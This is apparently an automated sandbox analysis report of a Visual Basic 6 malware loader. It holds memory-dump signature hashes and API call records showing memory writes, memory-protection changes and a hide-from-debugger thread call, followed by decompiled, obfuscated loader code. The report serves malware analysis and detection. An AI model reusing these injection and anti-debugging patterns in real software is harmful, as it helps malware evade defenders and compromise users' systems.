• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: c0bb471ecb0f47f65de2ddb89cebbdf2d71d767a1d28126cc71e85dac239d6e8
• Instruction ID: 3552c690aa15c28731081c023e88c5a06f616b75ffee1dc0ab16b76c8cb4bdda
• Opcode Fuzzy Hash: c0bb471ecb0f47f65de2ddb89cebbdf2d71d767a1d28126cc71e85dac239d6e8
• Instruction Fuzzy Hash: F5219230E0C346DDEF245B5987983B162ADBF47AA4F48566FDC074ACA6E37588C4CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 503177cc76510eb3fda2a7184e7a9a83213c23080327a6a108e90f0f803d22c6
• Instruction ID: 3c46a1e1d234d1e601e7f37ac1ab59f3e267141b652cd7790d2731724f6e4603
• Opcode Fuzzy Hash: 503177cc76510eb3fda2a7184e7a9a83213c23080327a6a108e90f0f803d22c6
• Instruction Fuzzy Hash: 1021A430E0C346DDEF245B1887983B262ADAF47A94F48456FCC474BCA6E37588C4CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: bc9bca61c2171cdb2d121b9bf20fb4e13172bacae28db28fa327d544ff04e8b5
• Instruction ID: 1054416ad2e2652671bd2c0960b715d48ccd5aff2b179b299d5390bf8a3e90da
• Opcode Fuzzy Hash: bc9bca61c2171cdb2d121b9bf20fb4e13172bacae28db28fa327d544ff04e8b5
• Instruction Fuzzy Hash: BD218130E0D342DDEF245B1487A83B162ADBF47A94F48456FCD474BCA6E3798885CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
• Opcode ID: 97728279d2f0aa0ff719dc278786edf3bd0106b610d4371f71c845ca3533f836
• Instruction ID: 1a565d042a1422c90180552e02a8821f864fc224277ff70e6d37f378cdec5b24
• Opcode Fuzzy Hash: 97728279d2f0aa0ff719dc278786edf3bd0106b610d4371f71c845ca3533f836
• Instruction Fuzzy Hash: C52108B1604348AFDF265E24CD91BF93B7AFF0A340F004659FD8AC25A2C73A8884CB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 129cebaee6b45a4c95dddc725e4efbbf2d36ddcf9d38914574c37bdf439ac7f7
• Instruction ID: 7a356630136be6a3e86cd8a0832a4c939cc8c742652be5ac00d67a2171699e47
• Opcode Fuzzy Hash: 129cebaee6b45a4c95dddc725e4efbbf2d36ddcf9d38914574c37bdf439ac7f7
• Instruction Fuzzy Hash: 5D119834E0D346DDEF245A1987983B162AE6F57E94F48456FCC434BCA6E37584C4CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: db643770154f2b2c54230a995cf9cba14c74856b5383212ea9e773ac4f6057a2
• Instruction ID: 83145a501cc1edcd729db9d4aca3f95188bea0a3200870e301da5aa7ef4d9d70
• Opcode Fuzzy Hash: db643770154f2b2c54230a995cf9cba14c74856b5383212ea9e773ac4f6057a2
• Instruction Fuzzy Hash: 84118634E0C346DDEF245A1987983B162AEAF47EA4F48456FCC034ACA6E37584C5CB42
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
• NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: InformationLibraryLoadThread
• String ID:
• API String ID: 543350213-0
• Opcode ID: 696a1b491752a169e35583341e1930947ff8d792cfd55f5e1a10f12d86ee8a86
• Instruction ID: 4c96750dad5a423d26665472c715e85f8941eb3aea5290df2ff90c919011a10a
• Opcode Fuzzy Hash: 696a1b491752a169e35583341e1930947ff8d792cfd55f5e1a10f12d86ee8a86
• Instruction Fuzzy Hash: 0B1159F1B953096FFF242A348C907EE269F8F46364F684225EE22072C1CB70C880CA81
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: cc71ec18f8136bb8acd2fa2f0578291818048c1976f8d642b7e3cb720a38b20b
• Instruction ID: f2ddbf4fe6e34183c30ee570556716de4081950d0114572da9f7a1d3502a7017
• Opcode Fuzzy Hash: cc71ec18f8136bb8acd2fa2f0578291818048c1976f8d642b7e3cb720a38b20b
• Instruction Fuzzy Hash: 62118E34E08342DCEF241A2987983B122AEAF47E94F48466F8C034ACA6E3328484C742
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 09851e9e244f498afc527f5090733a6abfe09f497dd1302479f55df03fb534dc
• Instruction ID: 5d308e2935382798da791d925db7282aa66d0d64c595b141cdc8fa49ef20d61a
• Opcode Fuzzy Hash: 09851e9e244f498afc527f5090733a6abfe09f497dd1302479f55df03fb534dc
• Instruction Fuzzy Hash: D6017534F0D342DCEF141A6987983B512AE6F57ED4F48456F8C434ADA6F3328484C702
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
• Opcode ID: c474997a7eda9f02770577b9a003849bcb4fabe8709897ad36f8918f878fb6c9
• Instruction ID: 2d78e42a56076544335624f7ad1d889d0b3905ee59f9e1f9f07b595184e9b047
• Opcode Fuzzy Hash: c474997a7eda9f02770577b9a003849bcb4fabe8709897ad36f8918f878fb6c9
• Instruction Fuzzy Hash: B111E1F6604308ABDF660E60DD90BF83B7AFF06354F440655FD8A825A2D73A8894CB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: ba741c53601f043ef16c6e0ccaefdf8fe01c0edde29eb64944e27fd8838ebe69
• Instruction ID: 43f72fa54f26c799bccd4c65305f7d65ca4d10d9ea328d5cd9ccb20756991585
• Opcode Fuzzy Hash: ba741c53601f043ef16c6e0ccaefdf8fe01c0edde29eb64944e27fd8838ebe69
• Instruction Fuzzy Hash: 4201A434F0D342DCBF542A6D8BA43F512AEAD97EC4B8C466E8D4387D9AF7224880C701
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
• Opcode ID: fa0fb7316b21402f1ebbcf8073a330be610fa21576706e0c92ca6fb008e62f7e
• Instruction ID: 50e40aa31fe3fc3aa44d6868224a9f88bd128984193bef12662b873a217430f8
• Opcode Fuzzy Hash: fa0fb7316b21402f1ebbcf8073a330be610fa21576706e0c92ca6fb008e62f7e
• Instruction Fuzzy Hash: 5401F1B5604308ABDF250E60DD91BF83B6AFF0A344F400659FE4B925A1C73A88D4CB41
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: cd8c92ac627a862bee87f3102c4748e76bfe6e01cae83e96b4df93ef785970fc
• Instruction ID: 6495fb7a2bfed183eac15149d7e8367c00506e9381b3c6a0dfedc5a259346c2d
• Opcode Fuzzy Hash: cd8c92ac627a862bee87f3102c4748e76bfe6e01cae83e96b4df93ef785970fc
• Instruction Fuzzy Hash: 79F06234F0D342DCBF552A6D8BA43B512AEAD97DD4B8C466F8D438AD9AF7224484C701
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ed20c4097237a62ef065ef434d15ac76da43faa356025a8e91e26ed5e6ff18b2
• Instruction ID: 622f4b993f805555fdab9184b87221cc1ac6b4e22ea9f8a080ff8d8898e7e527
• Opcode Fuzzy Hash: ed20c4097237a62ef065ef434d15ac76da43faa356025a8e91e26ed5e6ff18b2
• Instruction Fuzzy Hash: B401423251E3D2AAC7328B7006A95937FA0BF83210768C0ECC0C209067C2A29666DBD6
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 1c1c7336bb8f4551f13353182f666fca3f9bb9f656b6866f8e489d7533081c4a
• Instruction ID: d34a6e7f978cfa55ea62254e12aac740baca2112302cfe896ea35a8f707cc367
• Opcode Fuzzy Hash: 1c1c7336bb8f4551f13353182f666fca3f9bb9f656b6866f8e489d7533081c4a
• Instruction Fuzzy Hash: 33F09034F09342CCBF552A6D8BA83B5126EAC97D9478C466F8D438AD6AE7224884C301
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: fb67678bd800e96ecef1368be408c3a5cb8fe984df6e7ce14741cc81023001cd
• Instruction ID: bb1573241b1da878d60664652318dee209b0561d571cc80c14c483c82efc506e
• Opcode Fuzzy Hash: fb67678bd800e96ecef1368be408c3a5cb8fe984df6e7ce14741cc81023001cd
• Instruction Fuzzy Hash: 01F0A034F08342C9BF986A3D87983B5126EAC87EC4B8C851ECD0386D5AF7214484C301
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 0df7a8bc17be6cc3bda7f31eee81e95ded2f0612bbf7f27e1d3af06c58ae05ef
• Instruction ID: 2dd54f73b8f46f70b153737018c4288e530dadec5cd5066d789ede57911e2c22
• Opcode Fuzzy Hash: 0df7a8bc17be6cc3bda7f31eee81e95ded2f0612bbf7f27e1d3af06c58ae05ef
• Instruction Fuzzy Hash: 89F0E530F09341CDBF455A398B94375266E6C87D847588A6ECC538695EF7225484C311
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 971afdda932896e76d16f6f0a0d3b620a94732d3d16cdacc53d63784ad1b5f59
• Instruction ID: 9014bfd8a5bccdf30d8ade8353d3163101cb0d6f81b5539f48cec6a7e9b51df2
• Opcode Fuzzy Hash: 971afdda932896e76d16f6f0a0d3b620a94732d3d16cdacc53d63784ad1b5f59
• Instruction Fuzzy Hash: FCE01234F09301C96F995D75CBA93B9212FAD8BDC8A588A6ECC1345D9AE7324484C741
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: da4de566137d88dcd6f55828bccd46ad22ffa5ca7d9bf4345ae75fdf07bb83f5
• Instruction ID: 3a05b8d66116f019d722911c3b3de6a8f1046a4fae640f04421ed2d65a8ed3ce
• Opcode Fuzzy Hash: da4de566137d88dcd6f55828bccd46ad22ffa5ca7d9bf4345ae75fdf07bb83f5
• Instruction Fuzzy Hash: 4DE05B38D04301DDBF455DB5CBA93B9252F5D97D84B54893DCC4347509F7329484C301
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
Memory Dump Source
• Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 4039f35f521f9c2c04046382789cff76aec41d4d559902f0d3a430b70b605ba7
• Instruction ID: 36a19d418005af62ca92fba6c4dfbfef2a61e2e9f318e1d9855c2876342aafe4
• Opcode Fuzzy Hash: 4039f35f521f9c2c04046382789cff76aec41d4d559902f0d3a430b70b605ba7
                                                        • Instruction Fuzzy Hash: 3AC012E06240006E79058A68CD48C2BB2AA8AD8A28B14C32CB832222CCC930EC048632
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E004102A4(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				short _v28;
                                                        				long long _v36;
                                                        				char _v40;
                                                        				intOrPtr _v44;
                                                        				char _v48;
                                                        				intOrPtr _v52;
                                                        				char _v56;
                                                        				short _v60;
                                                        				short _v64;
                                                        				char _v80;
                                                        				char _v84;
                                                        				char _v88;
                                                        				void* _v92;
                                                        				char _v108;
                                                        				void* _v112;
                                                        				char _v116;
                                                        				char _v120;
                                                        				char _v124;
                                                        				intOrPtr _v128;
                                                        				char _v132;
                                                        				intOrPtr _v136;
                                                        				char _v140;
                                                        				intOrPtr _v144;
                                                        				char _v148;
                                                        				signed int _v152;
                                                        				signed int _v156;
                                                        				intOrPtr* _v160;
                                                        				signed int _v164;
                                                        				char _v176;
                                                        				signed int _v180;
                                                        				signed int _v184;
                                                        				signed int _v188;
                                                        				signed int _v192;
                                                        				signed int _v196;
                                                        				signed int _v200;
                                                        				signed int _v204;
                                                        				char _v208;
                                                        				signed int _v212;
                                                        				signed int _v216;
                                                        				signed int _v220;
                                                        				signed char _t240;
                                                        				signed int _t251;
                                                        				signed int _t260;
                                                        				signed int _t269;
                                                        				signed int _t291;
                                                        				signed int _t308;
                                                        				signed int _t312;
                                                        				signed int _t318;
                                                        				signed int _t323;
                                                        				signed int _t327;
                                                        				void* _t331;
                                                        				char* _t336;
                                                        				char* _t337;
                                                        				signed int _t340;
                                                        				char* _t347;
                                                        				char* _t348;
                                                        				char* _t352;
                                                        				void* _t365;
                                                        				void* _t367;
                                                        				intOrPtr _t368;
                                                        				long long* _t369;
                                                        
                                                        				_t368 = _t367 - 0xc;
                                                        				 *[fs:0x0] = _t368;
                                                        				L00401210();
                                                        				_v16 = _t368;
                                                        				_v12 = 0x401120;
                                                        				_v8 = _a4 & 0x00000001;
                                                        				_t240 = _a4 & 0x000000fe;
                                                        				_a4 = _t240;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t365);
                                                        				asm("fldz");
                                                        				_v48 = __fp0;
                                                        				L0040133C();
                                                        				L00401342();
                                                        				asm("fcomp qword [0x401118]");
                                                        				asm("fnstsw ax");
                                                        				asm("sahf");
                                                        				if(_t240 != 0) {
                                                        					_push(0);
                                                        					_push(L"fBR6AW7RVexTeqW175");
                                                        					_push( &_v80);
                                                        					_push( &_v108);
                                                        					L00401336();
                                                        					_t368 = _t368 + 0x10;
                                                        					if( *0x41233c != 0) {
                                                        						_v176 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v176 = 0x41233c;
                                                        					}
                                                        					_t14 =  &_v176; // 0x41233c
                                                        					_v152 =  *((intOrPtr*)( *_t14));
                                                        					_t336 =  &_v108;
                                                        					L00401324();
                                                        					_t337 =  &_v92;
                                                        					L0040132A();
                                                        					_t340 =  *((intOrPtr*)( *_v152 + 0x40))(_v152, _t337, _t337, _t336, _t336, 0x4046dc, L"XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37");
                                                        					asm("fclex");
                                                        					_v156 = _t340;
                                                        					if(_v156 >= 0) {
                                                        						_v180 = _v180 & 0x00000000;
                                                        					} else {
                                                        						_push(0x40);
                                                        						_push(0x4046fc);
                                                        						_push(_v152);
                                                        						_push(_v156);
                                                        						L0040131E();
                                                        						_v180 = _t340;
                                                        					}
                                                        					L00401318();
                                                        					L00401312();
                                                        				}
                                                        				_v140 = 0x85ac9480;
                                                        				_v136 = 0x5af4;
                                                        				_v116 = 0x335a;
                                                        				_v112 = 0x7cc;
                                                        				_v132 =  *0x401110;
                                                        				_t251 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v132, 0x71d2, 0x226fe,  &_v112, 0x2d05b0,  &_v116, L"JBhDOdbStjQgpp1CZ1sII6Bi6Mrw22",  &_v140,  &_v148);
                                                        				_v152 = _t251;
                                                        				if(_v152 >= 0) {
                                                        					_v184 = _v184 & 0x00000000;
                                                        				} else {
                                                        					_push(0x6f8);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v184 = _t251;
                                                        				}
                                                        				_v56 = _v148;
                                                        				_v52 = _v144;
                                                        				L0040130C();
                                                        				_v132 = 0xdf90170;
                                                        				_v128 = 0x5af5;
                                                        				_v116 = 0x4c10;
                                                        				_v112 = 0x30bb;
                                                        				_t260 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v112, L"Mnbd91g4szlScb9",  &_v116,  &_v132,  &_v84);
                                                        				_v152 = _t260;
                                                        				if(_v152 >= 0) {
                                                        					_v188 = _v188 & 0x00000000;
                                                        				} else {
                                                        					_push(0x6fc);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v188 = _t260;
                                                        				}
                                                        				L00401306();
                                                        				_v148 = 0xc187cfa0;
                                                        				_v144 = 0x5b04;
                                                        				_v140 = 0xe61c6f60;
                                                        				_v136 = 0x5b04;
                                                        				L0040130C();
                                                        				L0040130C();
                                                        				_v132 =  *0x401108;
                                                        				_t269 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0xa7dcb000, 0x5af7, 0x7b408a20, 0x5af3,  &_v132,  &_v84,  &_v88,  &_v140,  &_v148,  &_v112);
                                                        				_v152 = _t269;
                                                        				if(_v152 >= 0) {
                                                        					_v192 = _v192 & 0x00000000;
                                                        				} else {
                                                        					_push(0x700);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v192 = _t269;
                                                        				}
                                                        				_v64 = _v112;
                                                        				L00401300();
                                                        				_t369 = _t368 + 0xc;
                                                        				_t347 =  &_v84;
                                                        				L0040130C();
                                                        				_v112 = 0xce8;
                                                        				_v120 = 0x13c12e;
                                                        				_v164 =  *0x401104;
                                                        				_v180 =  *0x401100;
                                                        				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v120, _t347,  &_v112, 0x3152,  &_v84, _t347,  &_v132, 2,  &_v84,  &_v88);
                                                        				_v36 = _v132;
                                                        				_t348 =  &_v84;
                                                        				L00401306();
                                                        				_v112 = 0x3d3a;
                                                        				 *((intOrPtr*)( *_a4 + 0x718))(_a4, 0x31fc,  &_v112, 0x500,  &_v132);
                                                        				_v48 = _v132;
                                                        				_v44 = _v128;
                                                        				_v112 = 0x2f2d;
                                                        				 *_t369 =  *0x4010f8;
                                                        				_t291 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, _t348, _t348,  &_v112, 0xc2a,  &_v116);
                                                        				_v152 = _t291;
                                                        				if(_v152 >= 0) {
                                                        					_v196 = _v196 & 0x00000000;
                                                        				} else {
                                                        					_push(0x704);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v196 = _t291;
                                                        				}
                                                        				_v60 = _v116;
                                                        				_v116 = 0x35c9;
                                                        				_v112 = 0x640d;
                                                        				_v132 = 0xe19d4550;
                                                        				_v128 = 0x5b03;
                                                        				L0040130C();
                                                        				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v84,  &_v132,  &_v112,  &_v116, 0x3e4b22, L"aBxJ1EK9Or90qp8Afn674", 0x92f,  &_v120);
                                                        				_v40 = _v120;
                                                        				L00401306();
                                                        				_v124 = 0x5857a0;
                                                        				L0040130C();
                                                        				_v132 =  *0x4010f0;
                                                        				_v112 = 0x6e11;
                                                        				_v120 = 0xd8807;
                                                        				_t308 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, L"u5Ya74wgTUO8iTCNpzL0XAUeDHmKGZp2IrI136",  &_v120,  &_v112,  &_v132, 0x69758a20, 0x5af8,  &_v84,  &_v124);
                                                        				_v152 = _t308;
                                                        				if(_v152 >= 0) {
                                                        					_v200 = _v200 & 0x00000000;
                                                        				} else {
                                                        					_push(0x708);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v200 = _t308;
                                                        				}
                                                        				_t352 =  &_v84;
                                                        				L00401306();
                                                        				_v120 = 0xf5aa2;
                                                        				 *_t369 =  *0x4010e8;
                                                        				_t312 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t352, _t352,  &_v120);
                                                        				_v152 = _t312;
                                                        				if(_v152 >= 0) {
                                                        					_v204 = _v204 & 0x00000000;
                                                        				} else {
                                                        					_push(0x70c);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v204 = _t312;
                                                        				}
                                                        				if( *0x41233c != 0) {
                                                        					_v208 = 0x41233c;
                                                        				} else {
                                                        					_push(0x41233c);
                                                        					_push(0x40470c);
                                                        					L00401330();
                                                        					_v208 = 0x41233c;
                                                        				}
                                                        				_t190 =  &_v208; // 0x41233c
                                                        				_v152 =  *((intOrPtr*)( *_t190));
                                                        				_t318 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v92);
                                                        				asm("fclex");
                                                        				_v156 = _t318;
                                                        				if(_v156 >= 0) {
                                                        					_v212 = _v212 & 0x00000000;
                                                        				} else {
                                                        					_push(0x14);
                                                        					_push(0x4046fc);
                                                        					_push(_v152);
                                                        					_push(_v156);
                                                        					L0040131E();
                                                        					_v212 = _t318;
                                                        				}
                                                        				_v160 = _v92;
                                                        				_t323 =  *((intOrPtr*)( *_v160 + 0x78))(_v160,  &_v112);
                                                        				asm("fclex");
                                                        				_v164 = _t323;
                                                        				if(_v164 >= 0) {
                                                        					_v216 = _v216 & 0x00000000;
                                                        				} else {
                                                        					_push(0x78);
                                                        					_push(0x4048c0);
                                                        					_push(_v160);
                                                        					_push(_v164);
                                                        					L0040131E();
                                                        					_v216 = _t323;
                                                        				}
                                                        				_v28 = _v112;
                                                        				L00401318();
                                                        				_t327 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
                                                        				asm("fclex");
                                                        				_v152 = _t327;
                                                        				if(_v152 >= 0) {
                                                        					_v220 = _v220 & 0x00000000;
                                                        				} else {
                                                        					_push(0x1bc);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v220 = _t327;
                                                        				}
                                                        				_t331 =  *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v120);
                                                        				_v8 = 0;
                                                        				asm("wait");
                                                        				_push(0x4109c2);
                                                        				L00401312();
                                                        				return _t331;
                                                        			}
                                                        0x004105b6
                                                        0x004105bc
                                                        0x004105c1
                                                        0x004105c1
                                                        0x004105d4
                                                        0x004105e2
                                                        0x004105e7
                                                        0x004105ef
                                                        0x004105f2
                                                        0x004105f7
                                                        0x004105fd
                                                        0x0041060f
                                                        0x00410626
                                                        0x00410635
                                                        0x0041063e
                                                        0x00410641
                                                        0x00410644
                                                        0x00410649
                                                        0x00410669
                                                        0x00410672
                                                        0x00410678
                                                        0x0041067b
                                                        0x00410696
                                                        0x004106a1
                                                        0x004106a7
                                                        0x004106b4
                                                        0x004106d6
                                                        0x004106b6
                                                        0x004106b6
                                                        0x004106bb
                                                        0x004106c0
                                                        0x004106c3
                                                        0x004106c9
                                                        0x004106ce
                                                        0x004106ce
                                                        0x004106e1
                                                        0x004106e5
                                                        0x004106eb
                                                        0x004106f1
                                                        0x004106f8
                                                        0x00410707
                                                        0x00410737
                                                        0x00410740
                                                        0x00410746
                                                        0x0041074b
                                                        0x0041075a
                                                        0x00410765
                                                        0x00410768
                                                        0x0041076e
                                                        0x004107a0
                                                        0x004107a6
                                                        0x004107b3
                                                        0x004107d5
                                                        0x004107b5
                                                        0x004107b5
                                                        0x004107ba
                                                        0x004107bf
                                                        0x004107c2
                                                        0x004107c8
                                                        0x004107cd
                                                        0x004107cd
                                                        0x004107dc
                                                        0x004107df
                                                        0x004107e4
                                                        0x004107f7
                                                        0x00410802
                                                        0x00410808
                                                        0x00410815
                                                        0x00410837
                                                        0x00410817
                                                        0x00410817
                                                        0x0041081c
                                                        0x00410821
                                                        0x00410824
                                                        0x0041082a
                                                        0x0041082f
                                                        0x0041082f
                                                        0x00410845
                                                        0x00410862
                                                        0x00410847
                                                        0x00410847
                                                        0x0041084c
                                                        0x00410851
                                                        0x00410856
                                                        0x00410856
                                                        0x0041086c
                                                        0x00410874
                                                        0x0041088c
                                                        0x0041088f
                                                        0x00410891
                                                        0x0041089e
                                                        0x004108c0
                                                        0x004108a0
                                                        0x004108a0
                                                        0x004108a2
                                                        0x004108a7
                                                        0x004108ad
                                                        0x004108b3
                                                        0x004108b8
                                                        0x004108b8
                                                        0x004108ca
                                                        0x004108e2
                                                        0x004108e5
                                                        0x004108e7
                                                        0x004108f4
                                                        0x00410916
                                                        0x004108f6
                                                        0x004108f6
                                                        0x004108f8
                                                        0x004108fd
                                                        0x00410903
                                                        0x00410909
                                                        0x0041090e
                                                        0x0041090e
                                                        0x00410921
                                                        0x00410928
                                                        0x00410937
                                                        0x0041093d
                                                        0x0041093f
                                                        0x0041094c
                                                        0x0041096e
                                                        0x0041094e
                                                        0x0041094e
                                                        0x00410953
                                                        0x00410958
                                                        0x0041095b
                                                        0x00410961
                                                        0x00410966
                                                        0x00410966
                                                        0x00410981
                                                        0x00410987
                                                        0x0041098e
                                                        0x0041098f
                                                        0x004109bc
                                                        0x004109c1

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004102C2
                                                        • #584.MSVBVM60(?,?,?,?,?,?,00401216), ref: 004102F7
                                                        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401216), ref: 004102FC
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,fBR6AW7RVexTeqW175,00000000,?,?,?,?,?,?,00401216), ref: 0041031F
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,?,00401216), ref: 0041033A
                                                        • __vbaCastObjVar.MSVBVM60(?,004046DC,XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37), ref: 00410371
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,004046DC,XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37), ref: 0041037B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103B6
                                                        • __vbaFreeObj.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103CD
                                                        • __vbaFreeVar.MSVBVM60(00000000,?,004046FC,00000040), ref: 004103D5
